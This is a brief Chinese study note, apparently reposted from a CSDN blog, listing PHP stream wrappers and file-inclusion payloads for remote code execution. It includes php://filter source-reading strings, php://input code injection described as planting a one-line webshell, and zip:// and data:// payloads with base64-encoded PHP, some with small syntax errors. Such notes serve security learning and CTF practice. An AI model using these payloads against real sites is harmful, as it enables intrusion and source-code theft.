RCE+[伪协议综合]
<aside> 💡
伪协议种类
</aside>
**1 file:// — 访问本地文件系统
2 http:// — 访问 HTTP(s) 网址
3 ftp:// — 访问 FTP(s) URLs
4 php:// — 访问各个输入/输出流(I/O streams)
5 zlib:// — 压缩流
6 data:// — 数据(RFC 2397)
7 glob:// — 查找匹配的文件路径模式
8 phar:// — PHP 归档
9 ssh2:// — Secure Shell 2
10 rar:// — RAR
11 ogg:// — 音频流
12 expect:// — 处理交互式的流**
<aside> 💡
php://
</aside>
| 名称 | 描述 |
|---|---|
| resource=<要过滤的数据流> | 这个参数是必须的。它指定了你要筛选过滤的数据流。 |
| read=<读链的筛选列表> | **该参数可选。可以设定一个或多个过滤器名称,以管道符(` |
| write=<写链的筛选列表> | **该参数可选。可以设定一个或多个过滤器名称,以管道符(` |
| <;两个链的筛选列表> | 任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。 |
**php://filter/read=convert.base64-encode/resource=index.php
//读取PHP源文件
php://filter/resource=index.php
//访问原始数据只读,插入一句话木马执行
php://input 然后在post中<?php phpinfo() ?>
//访问原始数据只读,插入一句话木马执行**
<aside> 💡
file://
</aside>
**?file=file://C:phpinfo.txt //用于访问本地系统**
<aside> 💡
zip://
</aside>
**?file=zip://file.zip%23phpinfo.txt**
**zip://中只能传入绝对路径。
要用#分隔压缩包和压缩包里的内容,并且#要用url编码%23(即下述POC中#要用%23替换)
只需要是zip的压缩包即可,后缀名可以任意更改。
相同的类型的还有zlib://和bzip2://**
<aside> 💡
data://
</aside>
**?file=data:text/plain:base64.PD9waHAKcGhwaW5mbygpOwo/Pg==
?file=data:text/plain;<?php phpinfo():?>
?file=data://text/plain:base64,PD9waHAKcGhwaW5mbygpOwo/Pg==**
原文地址:https://blog.csdn.net/2302_81328699/article/details/142689593
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!